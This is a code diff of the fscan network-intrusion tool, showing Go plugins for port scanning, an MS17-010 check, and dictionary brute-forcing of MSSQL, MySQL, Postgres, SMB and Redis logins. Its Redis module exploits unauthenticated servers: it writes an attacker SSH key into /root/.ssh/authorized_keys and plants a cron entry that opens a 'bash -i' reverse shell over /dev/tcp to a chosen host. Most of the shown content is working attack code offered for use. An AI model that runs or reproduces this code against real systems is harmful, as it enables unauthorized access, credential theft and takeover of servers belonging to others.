+	conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 	conn.Write(negotiateProtocolRequest)
 	reply := make([]byte, 1024)
 	// let alone half packet
@@ -78,7 +75,7 @@ func MS17010Scan(info *common.HostInfo) {
 			for i := 10; i < len(sessionSetupResponse)-1; i++ {
 				if sessionSetupResponse[i] == 0 && sessionSetupResponse[i+1] == 0 {
 					os = string(sessionSetupResponse[10:i])
-					os = strings.Replace(os, string([]byte{0x00}), "",-1)
+					os = strings.Replace(os, string([]byte{0x00}), "", -1)
 					break
 				}
 			}
@@ -110,7 +107,7 @@ func MS17010Scan(info *common.HostInfo) {
 		//fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os)
 		//if runtime.GOOS=="windows" {fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os)
 		//} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)}
-		result := fmt.Sprintf("%s\tMS17-010\t(%s)", ip, os)
+		result := fmt.Sprintf("[+] %s\tMS17-010\t(%s)", ip, os)
 		common.LogSuccess(result)
 		// detect present of DOUBLEPULSAR SMB implant
 		trans2SessionSetupRequest[28] = treeID[0]
@@ -131,9 +128,8 @@ func MS17010Scan(info *common.HostInfo) {
 		}
 
 	} else {
-		result := fmt.Sprintf("%s\t        \t(%s)\n", ip, os)
+		result := fmt.Sprintf("%s  (%s)", ip, os)
 		common.LogSuccess(result)
 	}
 
 }
-

Plugins/mssql.go

@@ -1,48 +1,44 @@
 package Plugins
 
 import (
-	"../common"
 	"database/sql"
 	"fmt"
 	_ "github.com/denisenkom/go-mssqldb"
+	"github.com/shadow1ng/fscan/common"
 	"strings"
 	"sync"
 	"time"
 )
 
-
-
-
-func MssqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func MssqlScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 Loop:
-	for _,user:=range common.Userdict["mssql"]{
-		for _,pass:=range common.Passwords{
-			pass = strings.Replace(pass, "{user}", string(user), -1)
-			flag,err := MssqlConn(info,user,pass,ch,wg)
-			if flag==true && err==nil {
+	for _, user := range common.Userdict["mssql"] {
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag, err := MssqlConn(info, user, pass)
+			if flag == true && err == nil {
 				break Loop
 			}
 		}
 	}
 	wg.Done()
-	<- ch
+	<-ch
 }
 
-func MssqlConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host,Port,Username,Password := info.Host, common.PORTList["mssql"],user, pass
-	dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host,Username,Password,Port,time.Duration(info.Timeout)*time.Second)
+	Host, Port, Username, Password := info.Host, common.PORTList["mssql"], user, pass
+	dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
 	db, err := sql.Open("mssql", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
+		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
 		defer db.Close()
 		err = db.Ping()
 		if err == nil {
-			result := fmt.Sprintf("mssql:%v:%v:%v %v",Host,Port,Username,Password)
+			result := fmt.Sprintf("[+] mssql:%v:%v:%v %v", Host, Port, Username, Password)
 			common.LogSuccess(result)
 			flag = true
 		}
 	}
-	return flag,err
+	return flag, err
 }
-

Plugins/mysql.go

@@ -1,46 +1,45 @@
 package Plugins
 
 import (
-	"../common"
 	"database/sql"
 	"fmt"
-	_ "github.com/go-sql-driver/mysql"
 	"strings"
 	"sync"
 	"time"
+
+	_ "github.com/go-sql-driver/mysql"
+	"github.com/shadow1ng/fscan/common"
 )
 
-
-
-func MysqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func MysqlScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 Loop:
-	for _,user:=range common.Userdict["mysql"]{
-		for _,pass:=range common.Passwords{
-			pass = strings.Replace(pass, "{user}", string(user), -1)
-			flag,err := MysqlConn(info,user,pass,ch,wg)
-			if flag==true && err==nil {
+	for _, user := range common.Userdict["mysql"] {
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag, err := MysqlConn(info, user, pass)
+			if flag == true && err == nil {
 				break Loop
 			}
 		}
 	}
 	wg.Done()
-	<- ch
+	<-ch
 }
 
-func MysqlConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host,Port,Username,Password := info.Host, common.PORTList["mysql"],user, pass
-	dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host,Port, "mysql")
+	Host, Port, Username, Password := info.Host, common.PORTList["mysql"], user, pass
+	dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host, Port, "mysql")
 	db, err := sql.Open("mysql", dataSourceName)
-	db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
+	db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
 	if err == nil {
 		defer db.Close()
 		err = db.Ping()
 		if err == nil {
-			result := fmt.Sprintf("mysql:%v:%v:%v %v",Host,Port,Username,Password)
+			result := fmt.Sprintf("[+] mysql:%v:%v:%v %v", Host, Port, Username, Password)
 			common.LogSuccess(result)
 			flag = true
 		}
 	}
-	return flag,err
-}
+	return flag, err
+}

Plugins/portscan.go

@@ -2,13 +2,13 @@ package Plugins
 
 import (
 	"fmt"
+	"github.com/shadow1ng/fscan/common"
 	"net"
 	"sort"
 	"strconv"
 	"strings"
 	"sync"
 	"time"
-	"../common"
 )
 
 func ParsePort(ports string) []int {
@@ -35,37 +35,30 @@ func ParsePort(ports string) []int {
 	return scanPorts
 }
 
-func ProbeHosts(host string, ports <-chan int, respondingHosts chan<- string, done chan<- bool, model string, adjustedTimeout int) {
-	Timeout := time.Duration(adjustedTimeout) * time.Second
-	for port := range ports{
-		start := time.Now()
-		con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout) * time.Second)
-		duration := time.Now().Sub(start)
+func ProbeHosts(host string, ports <-chan int, respondingHosts chan<- string, done chan<- bool, adjustedTimeout int) {
+	for port := range ports {
+		con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout)*time.Second)
 		if err == nil {
 			defer con.Close()
 			address := host + ":" + strconv.Itoa(port)
-			result := fmt.Sprintf("%s open",address)
+			result := fmt.Sprintf("%s open", address)
 			common.LogSuccess(result)
 			respondingHosts <- address
 		}
-		if duration < Timeout {
-			difference := Timeout - duration
-			Timeout = Timeout - (difference / 2)
-		}
 	}
 	done <- true
 }
 
-func ScanAllports(address string, probePorts []int, threads int, timeout time.Duration, model string, adjustedTimeout int) ([]string, error) {
+func ScanAllports(address string, probePorts []int, threads int, adjustedTimeout int) ([]string, error) {
 	ports := make(chan int, 20)
 	results := make(chan string, 10)
 	done := make(chan bool, threads)
 
 	for worker := 0; worker < threads; worker++ {
-		go ProbeHosts(address, ports, results, done, model, adjustedTimeout)
+		go ProbeHosts(address, ports, results, done, adjustedTimeout)
 	}
 
-	for _,port := range probePorts{
+	for _, port := range probePorts {
 		ports <- port
 	}
 	close(ports)
@@ -80,61 +73,53 @@ func ScanAllports(address string, probePorts []int, threads int, timeout time.Du
 			if threads == 0 {
 				return responses, nil
 			}
-		case <-time.After(timeout):
-			return responses, nil
 		}
 	}
 }
 
-func TCPportScan(hostslist []string,ports string,model string,timeout int)  ([]string,[]string){
+func TCPportScan(hostslist []string, ports string, timeout int) ([]string, []string) {
 	var AliveAddress []string
 	var aliveHosts []string
 	probePorts := ParsePort(ports)
 	lm := 20
-	if (len(hostslist)>5 && len(hostslist)<=50) {
+	if len(hostslist) > 5 && len(hostslist) <= 50 {
 		lm = 40
-	}else if(len(hostslist)>50 && len(hostslist)<=100){
+	} else if len(hostslist) > 50 && len(hostslist) <= 100 {
 		lm = 50
-	}else if(len(hostslist)>100 && len(hostslist)<=150){
+	} else if len(hostslist) > 100 && len(hostslist) <= 150 {
 		lm = 60
-	}else if(len(hostslist)>150 && len(hostslist)<=200){
+	} else if len(hostslist) > 150 && len(hostslist) <= 200 {
 		lm = 70
-	}else if(len(hostslist)>200){
+	} else if len(hostslist) > 200 {
 		lm = 75
 	}
 
 	thread := 5
-	if (len(probePorts)>500 && len(probePorts)<=4000) {
-		thread = len(probePorts)/100
-	}else if (len(probePorts)>4000 && len(probePorts)<=6000) {
-		thread = len(probePorts)/200
-	}else if (len(probePorts)>6000 && len(probePorts)<=10000) {
-		thread = len(probePorts)/350
-	}else if (len(probePorts)>10000 && len(probePorts)<50000){
-		thread = len(probePorts)/400
-	}else if (len(probePorts)>=50000 && len(probePorts)<=65535){
-		thread = len(probePorts)/500
+	if len(probePorts) > 500 && len(probePorts) <= 4000 {
+		thread = len(probePorts) / 100
+	} else if len(probePorts) > 4000 && len(probePorts) <= 6000 {
+		thread = len(probePorts) / 200
+	} else if len(probePorts) > 6000 && len(probePorts) <= 10000 {
+		thread = len(probePorts) / 350
+	} else if len(probePorts) > 10000 && len(probePorts) < 50000 {
+		thread = len(probePorts) / 400
+	} else if len(probePorts) >= 50000 && len(probePorts) <= 65535 {
+		thread = len(probePorts) / 500
 	}
 
 	var wg sync.WaitGroup
 	mutex := &sync.Mutex{}
 	limiter := make(chan struct{}, lm)
-	aliveHost := make(chan string, lm/2)
-	go func() {
-		for s := range aliveHost {
-			fmt.Println(s)
-		}
-	}()
-	for _,host :=range hostslist{
+	for _, host := range hostslist {
 		wg.Add(1)
 		limiter <- struct{}{}
 		go func(host string) {
 			defer wg.Done()
-			if aliveAdd, err := ScanAllports(host, probePorts,thread, 5*time.Second,model,timeout);err == nil && len(aliveAdd)>0{
+			if aliveAdd, err := ScanAllports(host, probePorts, thread, timeout); err == nil && len(aliveAdd) > 0 {
 				mutex.Lock()
-				aliveHosts = append(aliveHosts,host)
-				for _,addr :=range aliveAdd{
-					AliveAddress = append(AliveAddress,addr)
+				aliveHosts = append(aliveHosts, host)
+				for _, addr := range aliveAdd {
+					AliveAddress = append(AliveAddress, addr)
 				}
 				mutex.Unlock()
 			}
@@ -142,6 +127,5 @@ func TCPportScan(hostslist []string,ports string,model string,timeout int)  ([]s
 		}(host)
 	}
 	wg.Wait()
-	close(aliveHost)
-	return aliveHosts,AliveAddress
+	return aliveHosts, AliveAddress
 }

Plugins/postgres.go

@@ -1,46 +1,45 @@
 package Plugins
 
 import (
-	"../common"
 	"database/sql"
 	"fmt"
-	_ "github.com/lib/pq"
 	"strings"
 	"sync"
 	"time"
+
+	_ "github.com/lib/pq"
+	"github.com/shadow1ng/fscan/common"
 )
 
-func PostgresScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func PostgresScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 Loop:
-	for _,user:=range common.Userdict["postgresql"]{
-		for _,pass:=range common.Passwords{
+	for _, user := range common.Userdict["postgresql"] {
+		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", string(user), -1)
-			flag,err := PostgresConn(info,user,pass,ch,wg)
-			if flag==true && err==nil {
+			flag, err := PostgresConn(info, user, pass)
+			if flag == true && err == nil {
 				break Loop
 			}
 		}
 	}
 	wg.Done()
-	<- ch
+	<-ch
 }
 
-func PostgresConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host,Port,Username,Password := info.Host, common.PORTList["psql"],user, pass
-	dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host,Port, "postgres", "disable")
+	Host, Port, Username, Password := info.Host, common.PORTList["psql"], user, pass
+	dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
 	db, err := sql.Open("mysql", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
+		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
 		defer db.Close()
 		err = db.Ping()
 		if err == nil {
-			result := fmt.Sprintf("Postgres:%v:%v:%v %v",Host,Port,Username,Password)
+			result := fmt.Sprintf("Postgres:%v:%v:%v %v", Host, Port, Username, Password)
 			common.LogSuccess(result)
 			flag = true
 		}
 	}
-	return flag,err
+	return flag, err
 }
-
-

Plugins/redis.go

@@ -1,9 +1,9 @@
 package Plugins
 
 import (
-	"../common"
 	"bufio"
 	"fmt"
+	"github.com/shadow1ng/fscan/common"
 	"net"
 	"os"
 	"strings"
@@ -11,171 +11,166 @@ import (
 	"time"
 )
 
-func RedisScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
-	flag,err := RedisUnauth(info)
-	if flag==true && err==nil {
+func RedisScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
+	flag, err := RedisUnauth(info)
+	if flag == true && err == nil {
 		wg.Done()
-		<- ch
+		<-ch
 		return
 	}
 
 Loop:
-		for _,pass:=range common.Passwords{
-			pass = strings.Replace(pass, "{user}", string("redis"), -1)
-			flag,err := RedisConn(info,pass,ch,wg)
-			if flag==true && err==nil {
-				break Loop
-			}
+	for _, pass := range common.Passwords {
+		pass = strings.Replace(pass, "{user}", string("redis"), -1)
+		flag, err := RedisConn(info, pass)
+		if flag == true && err == nil {
+			break Loop
 		}
+	}
 	wg.Done()
-	<- ch
+	<-ch
 }
 
-func RedisConn(info *common.HostInfo,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 	flag = false
-	realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["redis"])
-	conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
-	if err != nil{
-		return flag,err
+	realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
+	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	if err != nil {
+		return flag, err
 	}
 	defer conn.Close()
-	conn.Write([]byte(fmt.Sprintf("auth %s\r\n",pass)))
-	reply,err := readreply(conn)
-	//common.LogSuccess(result)
-	if strings.Contains(reply,"+OK"){
-		result := fmt.Sprintf("Redis:%s %s",realhost,pass)
+	conn.Write([]byte(fmt.Sprintf("auth %s\r\n", pass)))
+	reply, err := readreply(conn)
+	if strings.Contains(reply, "+OK") {
+		result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
 		common.LogSuccess(result)
 		flag = true
-		Expoilt(info ,realhost,conn)
+		Expoilt(info, realhost, conn)
 
 	}
-	return flag,err
+	return flag, err
 }
 
-
-func RedisUnauth(info *common.HostInfo) (flag bool,err error) {
+func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 	flag = false
-	realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["redis"])
-	conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
-	if err != nil{
-		return flag,err
+	realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
+	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	if err != nil {
+		return flag, err
 	}
 	defer conn.Close()
 	conn.Write([]byte("info\r\n"))
-	reply,err := readreply(conn)
-	if strings.Contains(reply,"redis_version"){
-		result := fmt.Sprintf("Redis:%s unauthorized",realhost)
+	reply, err := readreply(conn)
+	if strings.Contains(reply, "redis_version") {
+		result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
 		common.LogSuccess(result)
 		flag = true
-		Expoilt(info ,realhost,conn)
+		Expoilt(info, realhost, conn)
 	}
-	return flag,err
+	return flag, err
 }
 
-func Expoilt(info *common.HostInfo,realhost string,conn net.Conn)  {
-	flagSsh,flagCron := testwrite(conn)
-	if flagSsh == true{
-		result := fmt.Sprintf("Redis:%v like can write /root/.ssh/",realhost)
+func Expoilt(info *common.HostInfo, realhost string, conn net.Conn) {
+	flagSsh, flagCron := testwrite(conn)
+	if flagSsh == true {
+		result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost)
 		common.LogSuccess(result)
-		if info.RedisFile != ""{
-			if 	writeok,text := writekey(conn,info.RedisFile);writeok{
-				result := fmt.Sprintf("%v SSH public key was written successfully",realhost)
+		if info.RedisFile != "" {
+			if writeok, text := writekey(conn, info.RedisFile); writeok {
+				result := fmt.Sprintf("%v SSH public key was written successfully", realhost)
 				common.LogSuccess(result)
-			}else {
-				fmt.Println(realhost,"SSHPUB write failed",text)
+			} else {
+				fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
 			}
 		}
 	}
 
-	if flagCron == true{
-		result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/",realhost)
+	if flagCron == true {
+		result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost)
 		common.LogSuccess(result)
 		if info.RedisShell != "" {
-			if 	writeok,text := writecron(conn,info.RedisShell);writeok{
-				result := fmt.Sprintf("%v /var/spool/cron/root was written successfully",realhost)
+			if writeok, text := writecron(conn, info.RedisShell); writeok {
+				result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost)
 				common.LogSuccess(result)
-			}else {
-				fmt.Println(realhost,"cron write failed",text)
+			} else {
+				fmt.Println("Redis:", realhost, "cron write failed", text)
 			}
 		}
 	}
 }
 
-
-func writekey(conn  net.Conn,filename string) (flag bool,text string) {
+func writekey(conn net.Conn, filename string) (flag bool, text string) {
 	flag = false
 	conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /root/.ssh/\r\n")))
-	text,_ = readreply(conn)
-	if strings.Contains(text,"OK") {
+	text, _ = readreply(conn)
+	if strings.Contains(text, "OK") {
 		conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename authorized_keys\r\n")))
-		text,_ = readreply(conn)
-		if strings.Contains(text,"OK") {
-			key,_ := Readfile(filename)
-			conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n",key)))
-			text,_ = readreply(conn)
-			if strings.Contains(text,"OK") {
+		text, _ = readreply(conn)
+		if strings.Contains(text, "OK") {
+			key, _ := Readfile(filename)
+			conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n", key)))
+			text, _ = readreply(conn)
+			if strings.Contains(text, "OK") {
 				conn.Write([]byte(fmt.Sprintf("save\r\n")))
-				text,_ = readreply(conn)
-				if strings.Contains(text,"OK") {
+				text, _ = readreply(conn)
+				if strings.Contains(text, "OK") {
 					flag = true
 				}
 			}
 		}
 	}
-	if len(text) > 50{
+	text = strings.TrimSpace(text)
+	if len(text) > 50 {
 		text = text[:50]
 	}
-	return flag,text
+	return flag, text
 }
 
-
-
-func writecron(conn  net.Conn,host string) (flag bool,text string) {
+func writecron(conn net.Conn, host string) (flag bool, text string) {
 	flag = false
 	conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /var/spool/cron/\r\n")))
-	text,_ = readreply(conn)
-	if strings.Contains(text,"OK") {
+	text, _ = readreply(conn)
+	if strings.Contains(text, "OK") {
 		conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename root\r\n")))
-		text,_ = readreply(conn)
-		if strings.Contains(text,"OK") {
-			scan_ip,scan_port := strings.Split(host,":")[0],strings.Split(host,":")[1]
-			conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n",scan_ip,scan_port)))
-			text,_ = readreply(conn)
-			if strings.Contains(text,"OK") {
+		text, _ = readreply(conn)
+		if strings.Contains(text, "OK") {
+			scan_ip, scan_port := strings.Split(host, ":")[0], strings.Split(host, ":")[1]
+			conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n", scan_ip, scan_port)))
+			text, _ = readreply(conn)
+			if strings.Contains(text, "OK") {
 				conn.Write([]byte(fmt.Sprintf("save\r\n")))
-				text,_ = readreply(conn)
-				if strings.Contains(text,"OK") {
+				text, _ = readreply(conn)
+				if strings.Contains(text, "OK") {
 					flag = true
-				}
-			}
-		}
-	}
-	if len(text) > 50{
+				} //else {fmt.Println(text)}
+			} //else {fmt.Println(text)}
+		} //else {fmt.Println(text)}
+	} //else {fmt.Println(text)}
+	text = strings.TrimSpace(text)
+	if len(text) > 50 {
 		text = text[:50]
 	}
-	return flag,text
+	return flag, text
 }
 
-func Readfile(filename string)(string,error){
+func Readfile(filename string) (string, error) {
 	file, err := os.Open(filename)
-	if err!=nil{
-		fmt.Println("Open %s error, %v", filename,err)
-		return err.Error(),err
+	if err != nil {
+		fmt.Println("Open %s error, %v", filename, err)
+		return err.Error(), err
 	}
 	defer file.Close()
 	scanner := bufio.NewScanner(file)
-	//scanner.Split(bufio.ScanLines)
 	for scanner.Scan() {
-		//text := strings.TrimSpace(scanner.Text())
-		text := scanner.Text()
+		text := strings.TrimSpace(scanner.Text())
 		if text != "" {
-			return text,nil
+			return text, nil
 		}
 	}
-	return err.Error(),err
+	return err.Error(), err
 }
 
-func readreply(conn  net.Conn) (result string,err error) {
+func readreply(conn net.Conn) (result string, err error) {
 	buf := make([]byte, 4096)
 	for {
 		count, err := conn.Read(buf)
@@ -187,22 +182,22 @@ func readreply(conn  net.Conn) (result string,err error) {
 			break
 		}
 	}
-	return result,err
+	return result, err
 }
 
-func testwrite(conn  net.Conn) (flagSsh bool,flagCron bool) {
+func testwrite(conn net.Conn) (flagSsh bool, flagCron bool) {
 	flagSsh = false
 	flagCron = false
 	var text string
 	conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /root/.ssh/\r\n")))
-	text,_ = readreply(conn)
-	if strings.Contains(string(text),"OK") {
+	text, _ = readreply(conn)
+	if strings.Contains(string(text), "OK") {
 		flagSsh = true
 	}
 	conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /var/spool/cron/\r\n")))
-	text,_ = readreply(conn)
-	if strings.Contains(string(text),"OK") {
+	text, _ = readreply(conn)
+	if strings.Contains(string(text), "OK") {
 		flagCron = true
 	}
-	return flagSsh,flagCron
-}
+	return flagSsh, flagCron
+}

Plugins/scanner.go

@@ -1,29 +1,28 @@
 package Plugins
 
 import (
-	"../common"
 	"errors"
 	"fmt"
 	"reflect"
 	"strconv"
 	"strings"
 	"sync"
+
+	"github.com/shadow1ng/fscan/common"
 )
+
 func scan_func(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
 	f := reflect.ValueOf(m[name])
 	if len(infos) != f.Type().NumIn() {
 		err = errors.New("The number of infos is not adapted.")
-		if err != nil {
-			fmt.Println(err.Error())
-		//	//os.Exit(0)
-		}
+		fmt.Println(err.Error())
 	}
 	in := make([]reflect.Value, len(infos))
 	for k, info := range infos {
 		in[k] = reflect.ValueOf(info)
 	}
 	result = f.Call(in)
-	return result,nil
+	return result, nil
 }
 func IsContain(items []string, item string) bool {
 	for _, eachItem := range items {
@@ -34,54 +33,49 @@ func IsContain(items []string, item string) bool {
 	return false
 }
 
-func Scan(info *common.HostInfo)  {
-	Hosts,_ :=  common.ParseIP(info.Host)
-	if info.Isping == false{
-		Hosts =  ICMPRun(Hosts)
+func Scan(info common.HostInfo) {
+	fmt.Println("scan start")
+	Hosts, _ := common.ParseIP(info.Host, info.HostFile)
+	if info.Isping == false {
+		Hosts = ICMPRun(Hosts, info.IcmpThreads, info.Ping)
+		fmt.Println("icmp alive hosts len is:", len(Hosts))
 	}
-	_,AlivePorts := TCPportScan(Hosts,info.Ports,"icmp",3)   //return AliveHosts,AlivePorts
-	var severports  []string         	//severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"}
-	for _,port:=range common.PORTList{
-		severports = append(severports,strconv.Itoa(port))
+	_, AlivePorts := TCPportScan(Hosts, info.Ports, 3) //return AliveHosts,AlivePorts
+	var severports []string                            //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
+	for _, port := range common.PORTList {
+		severports = append(severports, strconv.Itoa(port))
 	}
-	severports1 := []string{"1521"}
-	var ch = make(chan int,info.Threads)
+	severports1 := []string{"1521"} //no scan these service
+	var ch = make(chan int, info.Threads)
 	var wg = sync.WaitGroup{}
 	var scantype string
-	for _,targetIP :=range AlivePorts{
-		scan_ip,scan_port := strings.Split(targetIP,":")[0],strings.Split(targetIP,":")[1]
+	for _, targetIP := range AlivePorts {
+		scan_ip, scan_port := strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
 		info.Host = scan_ip
-		if info.Scantype == "all"{
-			if IsContain(severports,scan_port){
-				//scantype = scan_port
-				AddScan(scan_port,info,ch,&wg)
-			}else {
-				if !IsContain(severports1,scan_port){
-					info.Url = fmt.Sprintf("http://%s",targetIP)
-					wg.Add(1)
-					go WebTitle(info,ch,&wg)  					//go scan_func(PluginList,"WebTitle",info,ch,&wg)
-					ch <- 1
+		info.Ports = scan_port
+		if info.Scantype == "all" {
+			if IsContain(severports, scan_port) {
+				AddScan(scan_port, info, ch, &wg)
+			} else {
+				if !IsContain(severports1, scan_port) {
+					AddScan("1000003", info, ch, &wg) //webtitle
 				}
 			}
-			if scan_port == "445"{
-				AddScan("1000001",info,ch,&wg)
-				AddScan("1000002",info,ch,&wg)
+			if scan_port == "445" { //scan more vul
+				AddScan("1000001", info, ch, &wg)
+				AddScan("1000002", info, ch, &wg)
 			}
-
-		}else {
-			port,_:=common.PORTList[info.Scantype]
+		} else {
+			port, _ := common.PORTList_bak[info.Scantype]
 			scantype = strconv.Itoa(port)
-			AddScan(scantype,info,ch,&wg)
-			//wg.Add(1)
-			//go scan_func(PluginList,scantype,info,ch,&wg)
-			//ch <- 1
+			AddScan(scantype, info, ch, &wg)
 		}
 	}
 	wg.Wait()
 }
 
-func AddScan(scantype string,info *common.HostInfo,ch chan int,wg *sync.WaitGroup)  {
+func AddScan(scantype string, info common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 	wg.Add(1)
-	go scan_func(PluginList,scantype,info,ch,wg)
+	go scan_func(PluginList, scantype, &info, ch, wg)
 	ch <- 1
-}
+}

Plugins/smb.go

@@ -1,75 +1,75 @@
 package Plugins
 
 import (
-	"../common"
+	"context"
 	"fmt"
+	"github.com/shadow1ng/fscan/common"
 	"github.com/stacktitan/smb/smb"
 	"strings"
 	"sync"
 	"time"
-	"context"
 )
-func SmbScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+
+func SmbScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 
 Loop:
-	for _,user:=range common.Userdict["smb"]{
-		for _,pass:=range common.Passwords{
+	for _, user := range common.Userdict["smb"] {
+		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", string(user), -1)
-			//fmt.Println(user,pass)
-			//flag,err := SmblConn(info,user,pass)
-			flag,err := doWithTimeOut(info,user,pass)
-			//fmt.Println(user,pass,flag,err)
-			if flag==true && err==nil {
+			flag, err := doWithTimeOut(info, user, pass)
+			if flag == true && err == nil {
 				break Loop
 			}
 		}
 	}
 	wg.Done()
-	<- ch
+	<-ch
 
 }
 
-func SmblConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
+func SmblConn(info *common.HostInfo, user string, pass string, Domain string) (flag bool, err error) {
 	flag = false
-	Host,Port,Username,Password := info.Host, common.PORTList["smb"],user, pass
+	Host, Port, Username, Password := info.Host, common.PORTList["smb"], user, pass
 	options := smb.Options{
 		Host:        Host,
 		Port:        445,
 		User:        Username,
 		Password:    Password,
-		Domain:      "",
+		Domain:      Domain,
 		Workstation: "",
-		Timeout:     info.Timeout,
-
 	}
 
 	session, err := smb.NewSession(options, false)
-	//fmt.Println(err)
 	if err == nil {
 		defer session.Close()
 		if session.IsAuthenticated {
-			result := fmt.Sprintf("SMB:%v:%v:%v %v",Host,Port,Username,Password)
+			var result string
+			if Domain != "" {
+				result = fmt.Sprintf("SMB:%v:%v:%v\\%v %v", Host, Port, Domain, Username, Password)
+			} else {
+				result = fmt.Sprintf("SMB:%v:%v:%v %v", Host, Port, Username, Password)
+			}
+
 			common.LogSuccess(result)
 			flag = true
 		}
 	}
-	return flag,err
+	return flag, err
 }
 
-func doWithTimeOut(info *common.HostInfo,user string,pass string)(flag bool,err error){
-	ctx,cancel := context.WithTimeout(context.Background(),time.Duration(info.Timeout)*time.Second)
-	//ctx,cancel := context.WithTimeout(context.Background(),1*time.Second)
+func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool, err error) {
+	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(info.Timeout)*time.Second)
 	defer cancel()
-	signal := make(chan int,1)
+	signal := make(chan int, 1)
 	go func() {
-		flag,err = SmblConn(info,user,pass)
+		flag, err = SmblConn(info, user, pass, info.Domain)
 		signal <- 1
 	}()
 
 	select {
 	case <-signal:
-		return flag,err
+		return flag, err
 	case <-ctx.Done():
-		return false,err
+		return false, err
 	}
-}
+}

Plugins/ssh.go

@@ -1,46 +1,39 @@
 package Plugins
 
 import (
-	"../common"
 	"fmt"
+	"github.com/shadow1ng/fscan/common"
 	"golang.org/x/crypto/ssh"
 	"net"
 	"strings"
 	"sync"
 	"time"
 )
